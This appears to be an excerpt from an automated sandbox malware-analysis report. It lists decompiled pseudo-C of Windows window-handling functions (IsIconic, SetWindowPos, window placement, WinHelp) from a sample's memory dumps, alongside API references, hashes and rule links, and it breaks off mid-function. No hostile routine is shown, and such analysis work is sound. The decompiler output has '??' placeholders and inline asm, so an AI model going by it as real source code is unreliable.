                                                                        0x0045008a
                                                                        0x00450096
                                                                        0x0045009b
                                                                        0x0045009c
                                                                        0x004500a1
                                                                        0x004500a4
                                                                        0x004500b3
                                                                        0x004500b8
                                                                        0x004500b9
                                                                        0x004500be
                                                                        0x004500c1
                                                                        0x004500cd
                                                                        0x004500e0
                                                                        0x004500f8
                                                                        0x004500ff
                                                                        0x00450102
                                                                        0x00450105
                                                                        0x0045010a
                                                                        0x0045010f
                                                                        0x00450124
                                                                        0x00450124
                                                                        0x00450084
                                                                        0x00450064
                                                                        0x0044fef8
                                                                        0x0044fef9
                                                                        0x00450149
                                                                        0x0045014c
                                                                        0x0045014f
                                                                        0x00000000
                                                                        0x00450155
                                                                        0x00450155
                                                                        0x00450158
                                                                        0x0045015f
                                                                        0x00000000
                                                                        0x00450165
                                                                        0x00450178
                                                                        0x0045017a
                                                                        0x0045017c
                                                                        0x00000000
                                                                        0x00450182
                                                                        0x00450190
                                                                        0x0045019e
                                                                        0x004501ad
                                                                        0x004501bb
                                                                        0x004501c7
                                                                        0x004501d5
                                                                        0x004501de
                                                                        0x004501f1
                                                                        0x00450204
                                                                        0x00450209
                                                                        0x0045020c
                                                                        0x0045020f
                                                                        0x00450214
                                                                        0x00450219
                                                                        0x0045022b
                                                                        0x0045022b
                                                                        0x0045017c
                                                                        0x0045015f
                                                                        0x0044feff
                                                                        0x00450277
                                                                        0x00450279
                                                                        0x0045027f
                                                                        0x0045028d
                                                                        0x0045029e
                                                                        0x004502af
                                                                        0x004502c0
                                                                        0x004502d1
                                                                        0x004502e2
                                                                        0x004502e2
                                                                        0x004502e7
                                                                        0x004502ec
                                                                        0x004502f1
                                                                        0x004502f7
                                                                        0x004502f7
                                                                        0x0044fef9
                                                                        0x0044fef2
                                                                        0x0044feed
                                                                        0x0044fee1

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: RestoreSave$FocusWindow
                                                                        • String ID:
                                                                        • API String ID: 1553564791-0
                                                                        • Opcode ID: 789ad88bdf9d0dc65a6386dd81293534481b1fb8196139f914db52c916d73454
                                                                        • Instruction ID: 36f440bda38272c3496fecbe59fbd02416aab16c8b4ac7df962fff14ab053147
                                                                        • Opcode Fuzzy Hash: 789ad88bdf9d0dc65a6386dd81293534481b1fb8196139f914db52c916d73454
                                                                        • Instruction Fuzzy Hash: 7DB15138A00104DFDB14DFA9D589EAEB3F5EB09304F6540A6F805A7762C738EE45DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00456024, Relevance: 9.1, APIs: 6, Instructions: 86windownativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 37%
                                                                        			E00456024(void* __eax) {
				struct HWND__* _t21;
				intOrPtr* _t26;
				signed int _t29;
				intOrPtr* _t30;
				int _t33;
				intOrPtr _t36;
				void* _t51;
				int _t60;

				_t51 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 != 0) {
					SetActiveWindow( *(_t51 + 0x30));
					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
						L6:
						E0045501C( *(_t51 + 0x30), 9, __eflags);
					} else {
						_t60 = IsWindowEnabled(E0043CC2C( *((intOrPtr*)(_t51 + 0x44))));
						if(_t60 == 0) {
							goto L6;
						} else {
							_push(0);
							_push(0xf120);
							_push(0x112);
							_push( *(_t51 + 0x30));
							L00406D8C();
						}
					}
					_t26 =  *0x495998; // 0x496a9c
					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					_t30 =  *0x495998; // 0x496a9c
					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
					_t36 =  *((intOrPtr*)(_t51 + 0x44));
					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
						E00450DD4(_t36, 0);
						E004531AC( *((intOrPtr*)(_t51 + 0x44)));
					}
					E00455698(_t51);
					_t21 =  *0x496c08; // 0x217094c
					_t55 =  *((intOrPtr*)(_t21 + 0x64));
					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
						_t21 = SetFocus(E0043CC2C(_t55));
					}
					if( *((short*)(_t51 + 0x10a)) != 0) {
						return  *((intOrPtr*)(_t51 + 0x108))();
					}
				}
				return _t21;
			}











                                                                        0x00456026
                                                                        0x0045602c
                                                                        0x00456033
                                                                        0x0045603d
                                                                        0x00456046
                                                                        0x00456080
                                                                        0x00456088
                                                                        0x00456057
                                                                        0x00456065
                                                                        0x00456067
                                                                        0x00000000
                                                                        0x00456069
                                                                        0x00456069
                                                                        0x0045606b
                                                                        0x00456070
                                                                        0x00456078
                                                                        0x00456079
                                                                        0x00456079
                                                                        0x00456067
                                                                        0x00456095
                                                                        0x0045609e
                                                                        0x004560a0
                                                                        0x004560a2
                                                                        0x004560a2
                                                                        0x004560a8
                                                                        0x004560b1
                                                                        0x004560b3
                                                                        0x004560b5
                                                                        0x004560b5
                                                                        0x004560bf
                                                                        0x004560c4
                                                                        0x004560c9
                                                                        0x004560dc
                                                                        0x004560e4
                                                                        0x004560e4
                                                                        0x004560eb
                                                                        0x004560f0
                                                                        0x004560f5
                                                                        0x004560fa
                                                                        0x00456104
                                                                        0x00456104
                                                                        0x00456111
                                                                        0x00000000
                                                                        0x0045611b
                                                                        0x00456111
                                                                        0x00456123

                                                                        APIs
                                                                        • IsIconic.USER32 ref: 0045602C
                                                                        • SetActiveWindow.USER32(?,?,?,?,00455A6E,00000000,00455F10), ref: 0045603D
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00456060
                                                                        • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00455A6E,00000000,00455F10), ref: 00456079
                                                                        • SetWindowPos.USER32(?,00000000,00000000,?,?,00455A6E,00000000,00455F10), ref: 004560BF
                                                                        • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00455A6E,00000000,00455F10), ref: 00456104
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                                                        • String ID:
                                                                        • API String ID: 3996302123-0
                                                                        • Opcode ID: 47e2a0eaacd7a01a8f9391b870114d1f20509724b9173774fd90bf9746b98b00
                                                                        • Instruction ID: addb31afefe918bacc646d6c2825af304f505386283c36deccf03dfcd198963b
                                                                        • Opcode Fuzzy Hash: 47e2a0eaacd7a01a8f9391b870114d1f20509724b9173774fd90bf9746b98b00
                                                                        • Instruction Fuzzy Hash: A7312F707002409BEF11EF69CC85B6A3798AB04715F4914AABD44DF2D7CA7DEC888759
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043C658, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E0043C658(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				void* _t31;
				int _t45;
				int _t51;
				void* _t52;
				int _t56;
				int _t58;

				_t56 = __ecx;
				_t58 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(E0043CF30(_t52) == 0) {
						L7:
						 *(_t52 + 0x40) = _t58;
						 *(_t52 + 0x44) = _t56;
						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
						_t31 = E0043CF30(_t52);
						__eflags = _t31;
						if(_t31 != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
							E00435F4C(_t52,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
						}
						L9:
						E00435C00(_t52);
						return E004037D8(_t52, _t66);
					}
					_t45 = IsIconic( *(_t52 + 0x180));
					_t66 = _t45;
					if(_t45 != 0) {
						goto L7;
					}
					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
					goto L9;
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t51;
					}
					goto L4;
				}
			}












                                                                        0x0043c661
                                                                        0x0043c663
                                                                        0x0043c665
                                                                        0x0043c66a
                                                                        0x0043c685
                                                                        0x0043c68e
                                                                        0x0043c6bc
                                                                        0x0043c6bc
                                                                        0x0043c6bf
                                                                        0x0043c6c5
                                                                        0x0043c6cb
                                                                        0x0043c6d0
                                                                        0x0043c6d5
                                                                        0x0043c6d7
                                                                        0x0043c6d9
                                                                        0x0043c6eb
                                                                        0x0043c6f5
                                                                        0x0043c700
                                                                        0x0043c701
                                                                        0x0043c702
                                                                        0x0043c703
                                                                        0x0043c70f
                                                                        0x0043c70f
                                                                        0x0043c714
                                                                        0x0043c716
                                                                        0x00000000
                                                                        0x0043c721
                                                                        0x0043c697
                                                                        0x0043c69c
                                                                        0x0043c69e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043c6b5
                                                                        0x00000000
                                                                        0x0043c679
                                                                        0x0043c679
                                                                        0x0043c67f
                                                                        0x0043c72c
                                                                        0x0043c72c
                                                                        0x00000000
                                                                        0x0043c67f

                                                                        APIs
                                                                        • IsIconic.USER32 ref: 0043C697
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0043C6B5
                                                                        • GetWindowPlacement.USER32(?,0000002C), ref: 0043C6EB
                                                                        • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 0043C70F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$Placement$Iconic
                                                                        • String ID: ,
                                                                        • API String ID: 568898626-3772416878
                                                                        • Opcode ID: d673cbac4b45b127f152e2a7f44669bc25f880b068426fc47df972cefe3dfc3b
                                                                        • Instruction ID: 5d51642662571711970a0e3d645df3d0aa1085e755de78576171e9613f821380
                                                                        • Opcode Fuzzy Hash: d673cbac4b45b127f152e2a7f44669bc25f880b068426fc47df972cefe3dfc3b
                                                                        • Instruction Fuzzy Hash: B7213071A00208ABCF54EF69C8C199A77A9AF0D354F05906BFE14EF346D779ED048BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00455F74, Relevance: 7.6, APIs: 5, Instructions: 59nativewindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E00455F74(void* __eax) {
				int _t21;
				struct HWND__* _t36;
				void* _t40;

				_t40 = __eax;
				_t1 = _t40 + 0x30; // 0x0
				_t21 = IsIconic( *_t1);
				if(_t21 == 0) {
					E00455688();
					_t2 = _t40 + 0x30; // 0x0
					SetActiveWindow( *_t2);
					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E0043CC2C( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
						_t15 = _t40 + 0x30; // 0x0
						_t21 = E0045501C( *_t15, 6, __eflags);
					} else {
						_t43 =  *((intOrPtr*)(_t40 + 0x44));
						_t36 = E0043CC2C( *((intOrPtr*)(_t40 + 0x44)));
						_t13 = _t40 + 0x30; // 0x0
						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_t14 = _t40 + 0x30; // 0x0
						_t21 =  *_t14;
						_push(_t21);
						L00406D8C();
					}
					if( *((short*)(_t40 + 0x102)) != 0) {
						return  *((intOrPtr*)(_t40 + 0x100))();
					}
				}
				return _t21;
			}






                                                                        0x00455f76
                                                                        0x00455f78
                                                                        0x00455f7c
                                                                        0x00455f83
                                                                        0x00455f8b
                                                                        0x00455f90
                                                                        0x00455f94
                                                                        0x00455f9d
                                                                        0x00456001
                                                                        0x00456004
                                                                        0x00455fc0
                                                                        0x00455fc4
                                                                        0x00455fd6
                                                                        0x00455fdc
                                                                        0x00455fe0
                                                                        0x00455fe5
                                                                        0x00455fe7
                                                                        0x00455fec
                                                                        0x00455ff1
                                                                        0x00455ff1
                                                                        0x00455ff4
                                                                        0x00455ff5
                                                                        0x00455ff5
                                                                        0x00456011
                                                                        0x00000000
                                                                        0x0045601b
                                                                        0x00456011
                                                                        0x00456023

                                                                        APIs
                                                                        • IsIconic.USER32 ref: 00455F7C
                                                                        • SetActiveWindow.USER32(00000000,00000000,?,?,0045660C), ref: 00455F94
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00455FB7
                                                                        • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,0045660C), ref: 00455FE0
                                                                        • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 00455FF5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$ActiveEnabledIconicNtdllProc_
                                                                        • String ID:
                                                                        • API String ID: 1720852555-0
                                                                        • Opcode ID: b48ccbd9e52d11f199ade556474468208e195aba5749c43cad4d731812e387f2
                                                                        • Instruction ID: b2ee28d00e52b312a41b956d375fa097b9583cfbf8aa8feeee27d57160c9c8e9
                                                                        • Opcode Fuzzy Hash: b48ccbd9e52d11f199ade556474468208e195aba5749c43cad4d731812e387f2
                                                                        • Instruction Fuzzy Hash: 9B1133716102009BDF14FE69C9C5B5B37A8AF08305F4414AAFE04DF287D679EC448714
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00427418, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E00427418(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t23;

				_t19 = _a8;
				_t23 = _a4;
				if( *0x496ac5 != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t23) == 0) {
							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t23,  &_v48);
						}
						return E00427388( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0x496aa0; // 0x427418
				 *0x496aa0 = E00427218(1, _t19, _t21, __edi, _t23);
				return  *0x496aa0(_t23, _t19);
			}










                                                                        0x00427420
                                                                        0x00427423
                                                                        0x0042742d
                                                                        0x00427457
                                                                        0x00427468
                                                                        0x0042747b
                                                                        0x0042746a
                                                                        0x0042746f
                                                                        0x0042746f
                                                                        0x00000000
                                                                        0x00427485
                                                                        0x00000000
                                                                        0x00427459
                                                                        0x00427434
                                                                        0x00427441
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AddressProc
                                                                        • String ID: MonitorFromWindow
                                                                        • API String ID: 190572456-2842599566
                                                                        • Opcode ID: 3bac1d995916bae630dc8399e42a92fe996f45957db1b53e04f404f2ee8b6375
                                                                        • Instruction ID: 35f16ded1955c2ed148f5dea8e37f92aac6793c71a0f0adcbddfe092b0b16418
                                                                        • Opcode Fuzzy Hash: 3bac1d995916bae630dc8399e42a92fe996f45957db1b53e04f404f2ee8b6375
                                                                        • Instruction Fuzzy Hash: AE01A2717081289AD700FB50AC81DEB775DEB11358B848137F815A3242D73CA90187AE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00430D08, Relevance: 6.0, APIs: 4, Instructions: 46sleepCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 58%
                                                                        			E00430D08(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				CHAR* _t20;
				long _t25;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t37;

				_push(0);
				_t34 = __eax;
				_push(_t37);
				_push(0x430d85);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E00430754(__eax);
				_t25 = GetTickCount();
				do {
					Sleep(0);
				} while (GetTickCount() - _t25 <= 0x3e8);
				E004303AC(_t34, _t25,  &_v8, 0, __edi, _t34);
				if(_v8 != 0) {
					_t20 = E004047F8(_v8);
					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(0x430d8c);
				return E00404348( &_v8);
			}









                                                                        0x00430d0b
                                                                        0x00430d0f
                                                                        0x00430d13
                                                                        0x00430d14
                                                                        0x00430d19
                                                                        0x00430d1c
                                                                        0x00430d21
                                                                        0x00430d2b
                                                                        0x00430d2d
                                                                        0x00430d2f
                                                                        0x00430d3b
                                                                        0x00430d49
                                                                        0x00430d52
                                                                        0x00430d5b
                                                                        0x00430d6a
                                                                        0x00430d6a
                                                                        0x00430d71
                                                                        0x00430d74
                                                                        0x00430d77
                                                                        0x00430d84

                                                                        APIs
                                                                          • Part of subcall function 00430754: WinHelpA.USER32 ref: 00430763
                                                                        • GetTickCount.KERNEL32 ref: 00430D26
                                                                        • Sleep.KERNEL32(00000000,00000000,00430D85,?,?,00000000,00000000,?,00430CFB), ref: 00430D2F
                                                                        • GetTickCount.KERNEL32 ref: 00430D34
                                                                        • WinHelpA.USER32 ref: 00430D6A
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CountHelpTick$Sleep
                                                                        • String ID:
                                                                        • API String ID: 2438605093-0
                                                                        • Opcode ID: b159ed8da29f14084cdfe4b7c42b37775e2f4efdee277ec71451ef76ad6eb451
                                                                        • Instruction ID: 728367182c2a4c0d1575522e4c38db70398e5defa9278ae5990baf4831071f11
                                                                        • Opcode Fuzzy Hash: b159ed8da29f14084cdfe4b7c42b37775e2f4efdee277ec71451ef76ad6eb451
                                                                        • Instruction Fuzzy Hash: D701A270700204AFE711FBA6CC52B5DB2E8DB4C704F52567BF500A75C1DA79AE009969
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043A6DC, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E0043A6DC(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				void* __edi;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr* _t68;
				void* _t69;

				_t68 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t69 = _t17 - 0x84;
				if(_t69 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E00436D1C(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						return E0043782C(_t50, _t68);
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E0043A648(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t68 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = E0043CF30(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t68 + 8)));
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_t32 = E0043CC2C(_t50);
						_push(_t32);
						L00406D8C();
						return _t32;
					}
					goto L27;
				}
				if(_t69 == 0) {
					_t21 = E0043782C(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					E00407314( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E004360F0(_t50,  &_v28,  &_v20);
					_t21 = E0043A5B4(_t50, 0,  &_v28, _t65, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t68 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t66 = E0044DA34(__eax);
					if(_t66 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t66 + 0xe4))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E0043CC2C(__eax);
						if(_t45 == GetCapture() &&  *0x47a96c != 0) {
							_t47 =  *0x47a96c; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0x47a96c; // 0x0
								E00437760(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}




















                                                                        0x0043a6e2
                                                                        0x0043a6e4
                                                                        0x0043a6e6
                                                                        0x0043a6e8
                                                                        0x0043a6ed
                                                                        0x0043a70c
                                                                        0x0043a70f
                                                                        0x0043a7ec
                                                                        0x0043a7f3
                                                                        0x0043a83e
                                                                        0x0043a83e
                                                                        0x0043a83e
                                                                        0x0043a82f
                                                                        0x00000000
                                                                        0x0043a833
                                                                        0x0043a71d
                                                                        0x0043a7b6
                                                                        0x0043a7bd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043a7c3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043a7c7
                                                                        0x0043a7ce
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043a7d3
                                                                        0x0043a7d7
                                                                        0x0043a7da
                                                                        0x0043a7dd
                                                                        0x0043a7e2
                                                                        0x0043a7e3
                                                                        0x00000000
                                                                        0x0043a7e3
                                                                        0x00000000
                                                                        0x0043a723
                                                                        0x0043a6ef
                                                                        0x0043a765
                                                                        0x0043a76e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043a77d
                                                                        0x0043a78c
                                                                        0x0043a799
                                                                        0x0043a7a0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043a7a6
                                                                        0x00000000
                                                                        0x0043a7a6
                                                                        0x0043a6f1
                                                                        0x0043a6f4
                                                                        0x0043a72f
                                                                        0x0043a733
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043a73f
                                                                        0x0043a747
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043a74d
                                                                        0x0043a6f6
                                                                        0x0043a6f7
                                                                        0x0043a756
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043a6f9
                                                                        0x0043a6fc
                                                                        0x0043a7f9
                                                                        0x0043a807
                                                                        0x0043a812
                                                                        0x0043a81a
                                                                        0x0043a825
                                                                        0x0043a82a
                                                                        0x0043a82a
                                                                        0x0043a81a
                                                                        0x0043a807
                                                                        0x0043a6fc

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Capture
                                                                        • String ID:
                                                                        • API String ID: 1145282425-3916222277
                                                                        • Opcode ID: c6b065f950aeea42138e2c2433ce8e98d842ebbd617e3b1284dea8e207de2a66
                                                                        • Instruction ID: 12ac0fe7456563294c718b5602fa9538c711e14ac05094fc64cad230b781499c
                                                                        • Opcode Fuzzy Hash: c6b065f950aeea42138e2c2433ce8e98d842ebbd617e3b1284dea8e207de2a66
                                                                        • Instruction Fuzzy Hash: C5318E707402005BC728BA39898566A22959B4D318F14B93FB4D6D7396DA3CCC66C78B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004414DC, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 83%
                                                                        			E004414DC() {
				int _v8;
				intOrPtr _t4;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t29;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t44;

				_t42 = _t44;
				_t4 =  *0x495c50; // 0x4967f0
				if( *((char*)(_t4 + 0xc)) == 0) {
					return _t4;
				} else {
					_v8 = SetErrorMode(0x8000);
					_push(_t42);
					_push(0x441642);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
